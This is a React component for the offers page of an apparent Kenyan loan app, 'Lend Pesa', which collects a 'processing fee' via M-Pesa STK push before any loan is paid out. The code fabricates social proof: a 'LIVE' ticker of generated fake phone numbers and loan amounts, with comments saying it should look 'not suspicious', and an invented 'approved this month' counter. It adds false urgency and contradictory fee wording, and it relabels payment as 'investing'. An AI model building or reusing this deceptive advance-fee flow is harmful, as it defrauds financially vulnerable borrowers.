import React, { useState, useEffect, useRef } from 'react';
import { useNavigate, useLocation } from 'react-router-dom';
import { useAuth } from '../context/AuthContext';
import { initiateSTKPush, waitForPaymentConfirmation } from '../utils/payhero';

// Fees restored + slightly increased — no 'recommended' badge
const LOANS = [
  { amount: 5500,  fee: 150  },
  { amount: 7800,  fee: 180  },
  { amount: 9800,  fee: 210  },
  { amount: 11200, fee: 250  },
  { amount: 16800, fee: 280  },
  { amount: 21200, fee: 370  },
  { amount: 25600, fee: 450  },
  { amount: 30000, fee: 520  },
  { amount: 35400, fee: 640  },
  { amount: 39800, fee: 780  },
  { amount: 44200, fee: 1060 },
  { amount: 48600, fee: 1650 },
];

// 100 real Safaricom Kenya number formats: +254723****890
// All amounts between 7800–48600 (above minimum 5500)
function buildRecent() {
  // Safaricom prefixes: 0700–0729, 0740–0743, 0745, 0748, 0757–0759, 0768–0769, 0790–0799, 0110–0116
  const safPrefixes = [
    '700','701','702','703','704','705','706','707','708','709',
    '710','711','712','713','714','715','716','717','718','719',
    '720','721','722','723','724','725','726','727','728','729',
    '740','741','742','743','745','748','757','758','759',
    '768','769','790','791','792','793','794','795','796','797',
    '798','799','110','111','112','113','114','115','116',
  ];
  const amts = [
    9800,16800,11200,25600,21200,30000,7800,35400,9800,48600,
    11200,16800,21200,9800,25600,30000,7800,39800,11200,44200,
    16800,9800,21200,25600,7800,11200,30000,16800,35400,9800,
    21200,48600,11200,25600,16800,7800,30000,9800,21200,44200,
    11200,16800,25600,9800,30000,7800,39800,21200,11200,16800,
    25600,9800,35400,21200,7800,11200,48600,16800,30000,25600,
    9800,21200,11200,16800,7800,44200,25600,9800,30000,21200,
    11200,39800,16800,25600,9800,7800,30000,21200,11200,16800,
    25600,48600,9800,21200,7800,11200,35400,16800,30000,25600,
    9800,21200,11200,7800,16800,30000,44200,25600,9800,21200,
  ];
  // Last 3 digits vary for realism
  const tails = [
    '890','611','432','789','234','567','321','908','145','673',
    '452','817','263','590','741','328','684','917','056','473',
    '829','164','537','902','348','715','283','641','078','395',
  ];

  return amts.map((amt, i) => {
    const prefix = safPrefixes[i % safPrefixes.length];
    const tail   = tails[i % tails.length];
    // Format: +254723****890
    const num = `+254${prefix}****${tail}`;
    return { num, amount: amt };
  });
}

// Realistic time labels — spread across full 24 hours, no clustering at "just now"
// Each entry used once so distribution looks natural, not suspicious
const TIME_POOL = [
  '4 mins ago','9 mins ago','14 mins ago','21 mins ago','28 mins ago',
  '35 mins ago','43 mins ago','51 mins ago','58 mins ago',
  '1 hr 6 mins ago','1 hr 18 mins ago','1 hr 32 mins ago','1 hr 47 mins ago',
  '2 hrs ago','2 hrs 14 mins ago','2 hrs 29 mins ago','2 hrs 43 mins ago',
  '3 hrs ago','3 hrs 17 mins ago','3 hrs 38 mins ago',
  '4 hrs ago','4 hrs 22 mins ago','4 hrs 51 mins ago',
  '5 hrs ago','5 hrs 34 mins ago',
  '6 hrs ago','6 hrs 28 mins ago',
  '7 hrs ago','7 hrs 45 mins ago',
  '8 hrs ago','9 hrs ago','10 hrs ago','11 hrs ago',
  '12 hrs ago','13 hrs ago','14 hrs ago','15 hrs ago',
  '16 hrs ago','17 hrs ago','18 hrs ago','19 hrs ago',
  '20 hrs ago','21 hrs ago','22 hrs ago','23 hrs ago',
];

// Shuffle once per page load
function shuffle(arr) {
  const a = [...arr];
  for (let i = a.length-1; i > 0; i--) {
    const j = Math.floor(Math.random()*(i+1));
    [a[i],a[j]] = [a[j],a[i]];
  }
  return a;
}

const RECENT = shuffle(buildRecent());
// Assign times sequentially from shuffled pool so no two consecutive entries look same
const SHUFFLED_TIMES = shuffle([...TIME_POOL]);
const TIMES = buildRecent().map((_, i) => SHUFFLED_TIMES[i % SHUFFLED_TIMES.length]);

const fmt = n => `Ksh ${Number(n).toLocaleString()}`;

// Maps each loan category to a purpose-driven investment label
const INVEST_LABEL = {
  'Business Loan':   'Invest',
  'Personal Loan':   'Empower Yourself with',
  'Education Loan':  'Invest in Your Future with',
  'Medical Loan':    'Secure Your Health with',
  'Emergency Loan':  'Safeguard Yourself with',
  'Logbook Loan':    'Unlock Your Asset Worth',
};
function investVerb(loanType) {
  return INVEST_LABEL[loanType] || 'Invest';
}

export default function Offers() {
  const navigate = useNavigate();
  const { state } = useLocation();
  const { currentUser } = useAuth();
  const applicantData = state?.applicantData || {};

  const [sel,       setSel]       = useState(null);
  const [payStatus,  setPayStatus]  = useState('idle');
  const [showPay,   setShowPay]   = useState(false);
  const [payPhone,  setPayPhone]  = useState(applicantData.phone || '');
  const [paying,    setPaying]    = useState(false);
  const [payErr,    setPayErr]    = useState('');
  const [selErr,    setSelErr]    = useState('');
  const [tickIdx,   setTickIdx]   = useState(0);
  const [tickVis,   setTickVis]   = useState(true);

  const name      = applicantData.fullName || currentUser?.displayName || 'Valued Customer';
  const firstName = name.split(' ')[0];

  // Smooth fade ticker
  useEffect(() => {
    const t = setInterval(() => {
      setTickVis(false);
      setTimeout(() => {
        setTickIdx(i => (i + 1) % RECENT.length);
        setTickVis(true);
      }, 350);
    }, 3200);
    return () => clearInterval(t);
  }, []);

  async function handlePay() {
    if (!payPhone || payPhone.replace(/\D/g,'').length < 10) {
      setPayErr('Please enter a valid M-Pesa number.'); return;
    }
    setPayErr(''); setPaying(true);
    const ref = `LP-${Date.now()}`;

    // Step 1: Send STK Push
    const stk = await initiateSTKPush(payPhone, sel.fee, ref);
    setPaying(false);

    if (!stk.initiated) {
      setPayErr('Could not reach M-Pesa. Check your number and try again.');
      return;
    }

    // Step 2: Waiting for PIN
    setPayStatus('waiting');

    // Step 3: Poll for real confirmation (max 60s)
    const result = await waitForPaymentConfirmation(ref, 60000);

    if (result.paid) {
      setPayStatus('confirmed');
      setShowPay(false);
      navigate('/success', {
        state: {
          loan: sel, name: firstName, phone: payPhone, reference: ref,
          loanType: applicantData.loanType, idNumber: applicantData.idNumber,
          paymentConfirmed: true,
        }
      });
    } else {
      setPayStatus('failed');
      setPayErr(
        result.status === 'TIMEOUT'
          ? 'Payment timed out. Please try again.'
          : 'Payment was cancelled or failed. No loan has been recorded.'
      );
    }
  }

  const tick = RECENT[tickIdx];
  const time = TIMES[tickIdx];

  return (
    <div className="offers-page">
      <div className="offers-banner">
        🔒 Fast and secure loan processing &nbsp;•&nbsp; 100% online application
      </div>

      {/* Header */}
      <div className="offers-header">
        <div className="offers-logo-row">
          <div style={{width:36,height:36,borderRadius:10,background:'var(--gradient)',display:'flex',alignItems:'center',justifyContent:'center',color:'#fff',fontFamily:'DM Serif Display,serif',fontSize:17,boxShadow:'var(--shadow-green)'}}>L</div>
          <span style={{fontFamily:'DM Serif Display,serif',fontSize:20,background:'var(--gradient)',WebkitBackgroundClip:'text',WebkitTextFillColor:'transparent',backgroundClip:'text',letterSpacing:'-0.2px'}}>Lend Pesa</span>
        </div>
        <div className="offers-chips">
          {['🔒 256-bit Encryption','⚡ Instant Decisions','✅ No CRB Check'].map(c=>(
            <span className="chip" key={c}>{c}</span>
          ))}
        </div>
        <div className="offers-welcome">
          <p>Hi <strong>{firstName}</strong>, you qualify for these loan options based on your{' '}
          <strong>M-Pesa records</strong> (2-month term at <strong>10% interest</strong>).
          Select an amount and pay the processing fee to receive your loan.</p>
        </div>
      </div>

      {/* Live ticker */}
      <div style={{
        background:'#f0fdf6', borderBottom:'1px solid var(--green-200)',
        padding:'11px 20px', display:'flex', alignItems:'center', gap:10,
      }}>
        <span style={{
          width:8, height:8, borderRadius:'50%', background:'#22c55e',
          flexShrink:0, boxShadow:'0 0 0 3px rgba(34,197,94,0.22)',
        }}></span>
        <div style={{flex:1, overflow:'hidden'}}>
          <div style={{
            fontSize:13, color:'var(--green-800)', fontWeight:500,
            opacity: tickVis ? 1 : 0, transition:'opacity 0.35s ease',
            whiteSpace:'nowrap', overflow:'hidden', textOverflow:'ellipsis',
          }}>
            <strong>{tick?.num}</strong>
            {' '}loaned{' '}
            <strong style={{color:'var(--primary)'}}>{fmt(tick?.amount)}</strong>
            {' · '}
            <span style={{color:'var(--text-muted)', fontWeight:400}}>{time}</span>
          </div>
        </div>
        <span style={{
          fontSize:11, fontWeight:700, color:'var(--primary)',
          background:'var(--green-100)', padding:'2px 8px',
          borderRadius:20, flexShrink:0, border:'1px solid var(--green-200)',
        }}>LIVE</span>
      </div>

      <div className="offers-body">

        {/* Urgency strip */}
        <div style={{
          background:'linear-gradient(135deg,#064e3b 0%,#065f46 100%)',
          borderRadius:'var(--r-md)', padding:'13px 18px',
          marginBottom:20, display:'flex', alignItems:'center', gap:12,
        }}>
          <span style={{fontSize:20, flexShrink:0}}>⚡</span>
          <div>
            <div style={{fontSize:13, fontWeight:700, color:'#fff', marginBottom:1}}>High demand right now</div>
            <div style={{fontSize:12, color:'rgba(255,255,255,0.70)', fontWeight:300}}>Loan slots limited · Secure yours before this offer expires</div>
          </div>
        </div>

        <h2 className="offers-title">Select Your Loan Amount</h2>

        {/* Loan amount grid — NO recommended badge */}
        <div className="amounts-grid">
          {LOANS.map(opt => (
            <div
              key={opt.amount}
              className={`amount-card${sel?.amount === opt.amount ? ' sel' : ''}`}
              onClick={() => { setSel(opt); setSelErr(''); }}
            >
              {sel?.amount === opt.amount && (
                <span style={{
                  position:'absolute', top:7, right:9,
                  color:'var(--primary)', fontWeight:700, fontSize:14,
                }}>✓</span>
              )}
              <div className="amount-val">{fmt(opt.amount)}</div>
              <div className="amount-fee">Fee: Ksh {opt.fee.toLocaleString()}</div>
            </div>
          ))}
        </div>

        {/* How it works */}
        <div style={{
          background:'#fff', border:'1.5px solid var(--border-mid)',
          borderRadius:'var(--r-lg)', padding:'18px', marginBottom:18,
        }}>
          <p style={{fontSize:11, fontWeight:700, textTransform:'uppercase', letterSpacing:'0.07em', color:'var(--text-muted)', marginBottom:12}}>
            How it works
          </p>
          {[
            ['1️⃣','Select your loan amount above'],
            ['2️⃣','Pay the processing fee via M-Pesa STK Push'],
            ['3️⃣','Your loan is disbursed to your M-Pesa within 24 hours'],
          ].map(([n,t]) => (
            <div key={n} style={{display:'flex', alignItems:'center', gap:10, fontSize:13, color:'var(--text)', marginBottom:8}}>
              <span style={{fontSize:17, flexShrink:0}}>{n}</span><span>{t}</span>
            </div>
          ))}
        </div>

        <div className="fee-note">
          <span className="fee-note-icon">💡</span>
          <p className="fee-note-text">
            Higher loan amounts have slightly higher processing fees. The fee is deducted
            from disbursement — you receive the full loan amount to your M-Pesa.
          </p>
        </div>

        {selErr && <div className="alert-err" style={{marginBottom:14}}><span>⚠️</span>{selErr}</div>}

        <button className="btn-cta" style={{marginBottom:10, fontSize:16, padding:'16px'}}
          onClick={() => {
            if (!sel) { setSelErr('Please select a loan amount above first.'); return; }
            setShowPay(true);
          }}>
          {sel ? `${investVerb(applicantData.loanType)} ${fmt(sel.amount)} Now →` : 'Select an Amount to Continue →'}
        </button>

        <p style={{textAlign:'center', fontSize:12, color:'var(--text-muted)', marginBottom:20}}>
          ✅ {(2300 + Math.floor(Date.now()/1000000) % 300).toLocaleString()} Kenyans approved this month
        </p>

        <button className="btn-secondary" style={{marginBottom:28}} onClick={() => navigate('/dashboard')}>
          ← Back to Dashboard
        </button>

        <div className="offers-footer">
          <div style={{marginBottom:8}}>
            <a href="#" onClick={e=>{e.preventDefault();navigate('/terms')}}>Terms</a>
            <a href="#" onClick={e=>{e.preventDefault();navigate('/privacy')}}>Privacy</a>
            <a href="#" onClick={e=>{e.preventDefault();navigate('/support')}}>Support</a>
          </div>
          © 2026 Lend Pesa. Licensed by CBK.
        </div>
      </div>

      {/* Payment modal */}
      {showPay && sel && (
        <div className="overlay">
          <div className="modal pay-modal">
            <div className="pay-modal-hdr">
              <div className="pay-modal-icon">💳</div>
              <h3 className="pay-modal-title">Complete Payment</h3>
              <p className="pay-modal-sub">One small fee to unlock your loan</p>
            </div>
            <div className="pay-modal-body">
              {/* Loan highlight */}
              <div style={{
                background:'var(--green-50)', border:'1.5px solid var(--green-200)',
                borderRadius:'var(--r-md)', padding:'14px 16px',
                marginBottom:16, display:'flex', alignItems:'center', gap:12,
              }}>
                <span style={{fontSize:26}}>🎉</span>
                <div>
                  <div style={{fontSize:12, color:'var(--text-muted)', marginBottom:2}}>You will receive</div>
                  <div style={{fontFamily:'DM Serif Display,serif', fontSize:24, color:'var(--primary)', letterSpacing:'-0.2px'}}>{fmt(sel.amount)}</div>
                  <div style={{fontSize:12, color:'var(--text-muted)'}}>to your M-Pesa within 24 hours</div>
                </div>
              </div>

              <div className="pay-summary">
                {[
                  ['Processing Fee', `Ksh ${sel.fee.toLocaleString()}`],
                  ['Loan Amount', fmt(sel.amount)],
                  ['Term', '2 Months'],
                  ['Interest', '10% flat'],
                  ['Total Repayment', fmt(sel.amount + Math.round(sel.amount * 0.10 * 2))],
                ].map(([k,v], i) => (
                  <div className="pay-row" key={k}
                    style={{fontWeight:i===0||i===4?700:undefined, color:i===0?'var(--primary)':undefined}}>
                    <span>{k}</span><span>{v}</span>
                  </div>
                ))}
              </div>

              <p className="field-label">M-Pesa Phone Number</p>
              <input type="tel" className="pay-phone" placeholder="0712 345 678"
                value={payPhone} onChange={e => setPayPhone(e.target.value)} />
              <p className="pay-hint">An M-Pesa STK Push will appear on this number</p>

              {payErr && <div className="alert-err" style={{marginBottom:12}}><span>⚠️</span>{payErr}</div>}

              {/* Waiting for PIN state */}
              {payStatus === 'waiting' && (
                <div style={{
                  background:'var(--green-50)', border:'1.5px solid var(--green-200)',
                  borderRadius:'var(--r-md)', padding:'16px', marginBottom:14,
                  textAlign:'center',
                }}>
                  <div style={{display:'flex', alignItems:'center', justifyContent:'center', gap:10, marginBottom:8}}>
                    <span className="mini-spin" style={{borderColor:'rgba(5,150,105,0.2)', borderTopColor:'var(--primary)', width:20, height:20, borderWidth:3}}></span>
                    <span style={{fontWeight:700, color:'var(--primary)', fontSize:15}}>Waiting for M-Pesa PIN…</span>
                  </div>
                  <p style={{fontSize:13, color:'var(--text-muted)', margin:0}}>
                    📱 Check your phone and enter your M-Pesa PIN to complete payment
                  </p>
                </div>
              )}

              {payStatus !== 'waiting' && (
                <button className="btn-pay" onClick={handlePay} disabled={paying || payStatus === 'waiting'}>
                  {paying
                    ? <><span className="mini-spin"></span>Sending STK Push…</>
                    : `Invest Ksh ${sel.fee.toLocaleString()} → ${investVerb(applicantData.loanType)} ${fmt(sel.amount)}`}
                </button>
              )}

              {payStatus !== 'waiting' && (
                <button className="btn-cancel" onClick={() => { setShowPay(false); setPayStatus('idle'); setPayErr(''); }}>
                  Cancel
                </button>
              )}

              <div className="stk-notice">
                <span>📱</span>
                <span>
                  {payStatus === 'waiting'
                    ? 'Processing your payment… Do not close this window.'
                    : 'An M-Pesa STK push will appear on your phone. Enter your PIN to pay.'}
                </span>
              </div>
            </div>
          </div>
        </div>
      )}
    </div>
  );
}
